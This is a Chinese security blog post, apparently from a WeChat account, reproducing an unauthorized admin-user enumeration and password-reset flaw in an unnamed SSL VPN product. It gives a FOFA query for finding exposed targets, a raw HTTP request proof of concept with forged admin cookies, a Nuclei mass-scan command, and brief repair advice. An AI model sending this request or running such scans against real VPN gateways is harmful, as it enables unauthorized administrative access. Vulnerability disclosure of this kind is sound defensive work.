点击上方蓝字关注我们
BEGINNING OF SPRING
0x01
阅读须知
Reading Instructions
数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。
0x02
漏洞概述
Vulnerability Overview
某单位的安全接入网关系统(SSL VPN)在满足客户的身份安全、传输加密、访问授权等多种安全需求基础上,针对 BYOD 及 CYOD 等移动办公场景,提供统一的安全办公接入入口、门户式单点登录、应用 APP安全加固、移动应用数据安全,从而为客户提供“一站式”安全移动办公解决方案。
该SSL VPN系统存在未授权管理用户遍历+任意账号密码修改漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
0x03
漏洞复现
Vulnerability Recurrence
fofa:title=“**xin vpn”
1.执行如下POC,进而获取绝对路径的敏感信息。
GET /admin/group/x_group.php?id=
1
HTTP/
1.1
Host:
{{Hostname}}
Cookie:
admin_id=
1
; gw_admin_ticket=
1
;
User-
Agent:
Mozilla/
5.0
(Windows NT
10.0
; Win64; x64) AppleWebKit/
537.36
(KHTML, like Gecko)
Accept:
text/html,application/xhtml+xml,application/xml;q=
0
.
9
,image/avif,image/webp,image/apng,*
/*;q=0.8,application/signed
-exchange;v=b3;q=
0
.
7
Connection:
close
-------------------------------------
其中Hostname为目标漏洞平台的实际地址或域名
2.【郑重声明】由于该产品漏洞危害等级较高,为避免被他人不当利用,正式发布软文之前,经过特殊处理,友情分享验证脚本用于学习与研究,同时官方希望广大白帽子以合法的手段助力VPN产品的安全稳定与可靠提升。
维护国家网络安全,人人皆有责任;
助力国家网络产品,人人应尽义务;
(文章仅限技术交流,禁止非授权操作!)
0x04
漏洞脚本
Vulnerability script
1.Nuclei验证脚本命令使用如下:
nuclei
.exe
-t
Vpn_Password_Reset
.yaml
-l
Vpn_Password_Reset_Subs
.txt
--------------------------------------------
Vpn_Password_Reset_Subs
.txt
可以结合实际情况自定义
--------------------------------------------
2.Nuclei的运行截图如下:
3.关注公众号并回复:VPN,获取脚本。
0x05
修复建议
Repair Suggestions
1.实施产品的权限访问控制,降低互联网搜索引擎的查询。
2.加强后台认证要求(如AAAA策略等),提高口令的安全性。
3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。
原文始发于微信公众号(数字人才创研院):漏洞复现|某VPN存在未授权管理用户遍历+任意账号密码修改漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论